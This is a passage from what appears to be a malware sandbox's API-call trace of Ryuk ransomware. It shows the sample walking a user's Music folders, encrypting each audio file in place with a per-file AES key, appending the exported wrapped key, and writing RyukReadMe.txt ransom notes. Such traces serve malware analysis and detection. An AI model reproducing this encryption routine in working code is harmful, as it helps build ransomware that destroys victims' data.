halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yby2oeah8h5a\\c6fejv\\heq27f2tqdoj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0157.309] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=86957) returned 1 [0157.310] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=86957) returned 1 [0157.310] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x1528b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.310] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0157.310] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.310] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0157.310] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.310] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.311] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x153ad, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x153ad, lpOverlapped=0x0) returned 1 [0157.312] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0157.312] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x153ad, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x153b0) returned 1 [0157.312] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.313] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x153b0, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x153b0, lpOverlapped=0x0) returned 1 [0157.313] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0157.313] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0157.313] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0157.313] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0157.313] CloseHandle (hObject=0xd4) returned 1 [0157.328] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.332] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.332] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.332] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0157.333] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.333] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\Yby2OeaH8H5a\\c6FEjv\\thrSC62Ik3POUxnrgyW1.mp3", dwFileAttributes=0x80) returned 1 [0157.333] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\Yby2OeaH8H5a\\c6FEjv\\thrSC62Ik3POUxnrgyW1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yby2oeah8h5a\\c6fejv\\thrsc62ik3pouxnrgyw1.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0157.333] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=54659) returned 1 [0157.333] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=54659) returned 1 [0157.333] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xd461, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.333] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0157.334] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.334] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0157.334] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.334] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.334] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xd583, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xd583, lpOverlapped=0x0) returned 1 [0157.335] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0157.335] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xd583, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xd590) returned 1 [0157.336] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.336] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd590, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xd590, lpOverlapped=0x0) returned 1 [0157.343] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0157.343] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0157.343] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0157.343] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0157.343] CloseHandle (hObject=0xd4) returned 1 [0157.359] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.363] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.363] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.363] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0157.363] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0157.363] SetLastError (dwErrCode=0x0) [0157.363] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\Yby2OeaH8H5a\\c6FEjv\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yby2oeah8h5a\\c6fejv\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0157.363] GetLastError () returned 0x0 [0157.364] WriteFile (in: hFile=0xe4, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0157.364] CloseHandle (hObject=0xe4) returned 1 [0157.364] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.364] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.365] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\Yby2OeaH8H5a\\R9EIqiYA1w.m4a", dwFileAttributes=0x80) returned 1 [0157.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\Yby2OeaH8H5a\\R9EIqiYA1w.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yby2oeah8h5a\\r9eiqiya1w.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0157.365] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=62894) returned 1 [0157.365] GetFileSizeEx (in: hFile=0xe4, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=62894) returned 1 [0157.365] SetFilePointerEx (in: hFile=0xe4, liDistanceToMove=0xf48c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.365] ReadFile (in: hFile=0xe4, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0157.366] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.366] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0157.366] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.366] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.366] ReadFile (in: hFile=0xe4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf5ae, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0xf5ae, lpOverlapped=0x0) returned 1 [0157.367] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0157.367] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xf5ae, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0xf5b0) returned 1 [0157.367] SetFilePointer (in: hFile=0xe4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.367] WriteFile (in: hFile=0xe4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf5b0, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0xf5b0, lpOverlapped=0x0) returned 1 [0157.368] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0157.368] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.368] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0157.368] WriteFile (in: hFile=0xe4, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0157.368] CloseHandle (hObject=0xe4) returned 1 [0157.384] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.388] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.388] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.388] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0157.388] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0157.388] SetLastError (dwErrCode=0x0) [0157.388] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\Yby2OeaH8H5a\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yby2oeah8h5a\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0157.389] GetLastError () returned 0xb7 [0157.389] CloseHandle (hObject=0x190) returned 1 [0157.389] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0157.389] SetLastError (dwErrCode=0x0) [0157.389] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0157.389] GetLastError () returned 0xb7 [0157.389] CloseHandle (hObject=0x190) returned 1 [0157.389] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0157.389] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.389] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0157.389] SetLastError (dwErrCode=0x0) [0157.389] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yua2lr\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xe4 [0157.389] GetLastError () returned 0x0 [0157.389] WriteFile (in: hFile=0xe4, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0157.390] CloseHandle (hObject=0xe4) returned 1 [0157.390] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\6adhg12pBbquMey\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0157.390] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0157.390] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0157.390] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.391] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\6adhg12pBbquMey\\0HtPzHc qUXwN52JdHA8.mp3", dwFileAttributes=0x80) returned 1 [0157.391] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\6adhg12pBbquMey\\0HtPzHc qUXwN52JdHA8.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yua2lr\\6adhg12pbbqumey\\0htpzhc quxwn52jdha8.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0157.391] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=59420) returned 1 [0157.391] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=59420) returned 1 [0157.391] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xe6fa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.391] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0157.392] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.392] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0157.392] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.392] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.392] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0xe81c, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0xe81c, lpOverlapped=0x0) returned 1 [0157.393] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0157.393] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0xe81c, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0xe820) returned 1 [0157.393] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.393] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xe820, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0xe820, lpOverlapped=0x0) returned 1 [0157.394] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab160*, lpNumberOfBytesWritten=0x29ab124*=0x6, lpOverlapped=0x0) returned 1 [0157.394] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab130 | out: pbData=0x0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0157.394] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab1b0, pdwDataLen=0x29ab130 | out: pbData=0x29ab1b0*, pdwDataLen=0x29ab130*=0x10c) returned 1 [0157.394] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab1b0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: lpBuffer=0x29ab1b0*, lpNumberOfBytesWritten=0x29ab124*=0x10c, lpOverlapped=0x0) returned 1 [0157.394] CloseHandle (hObject=0xd4) returned 1 [0157.409] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.413] CryptDestroyKey (hKey=0x3b8690) returned 1 [0157.413] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0157.414] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0157.414] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0157.414] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\6adhg12pBbquMey\\qv9PUK75H6tyFhm.m4a", dwFileAttributes=0x80) returned 1 [0157.414] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZCXoOt5FirBqP5\\crSOjwjV-bX9FMGklHL\\YUA2lr\\6adhg12pBbquMey\\qv9PUK75H6tyFhm.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zcxoot5firbqp5\\crsojwjv-bx9fmgklhl\\yua2lr\\6adhg12pbbqumey\\qv9puk75h6tyfhm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0157.414] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=6265) returned 1 [0157.414] GetFileSizeEx (in: hFile=0xd4, lpFileSize=0x29ab138 | out: lpFileSize=0x29ab138*=6265) returned 1 [0157.414] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x1757, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.414] ReadFile (in: hFile=0xd4, lpBuffer=0x29ab188, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab148, lpOverlapped=0x0 | out: lpBuffer=0x29ab188*, lpNumberOfBytesRead=0x29ab148*=0x19, lpOverlapped=0x0) returned 1 [0157.415] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.415] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab110 | out: phKey=0x29ab110*=0x3b8690) returned 1 [0157.415] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0157.415] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.415] ReadFile (in: hFile=0xd4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1879, lpNumberOfBytesRead=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab120*=0x1879, lpOverlapped=0x0) returned 1 [0157.415] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab11c*=0xf4250) returned 1 [0157.415] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1879, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab118*=0x1880) returned 1 [0157.415] SetFilePointer (in: hFile=0xd4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0157.416] WriteFile (in: hFile=0xd4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1880, lpNumberOfBytesWritten=0x29ab120, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab120*=0x1880, lpOverlapped=0x0) returned 1 [0157.416] WriteFile (in: hFile=0xd4, lpBuffer=0x29ab160*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab124, lpOverlapped=0x0 | out: 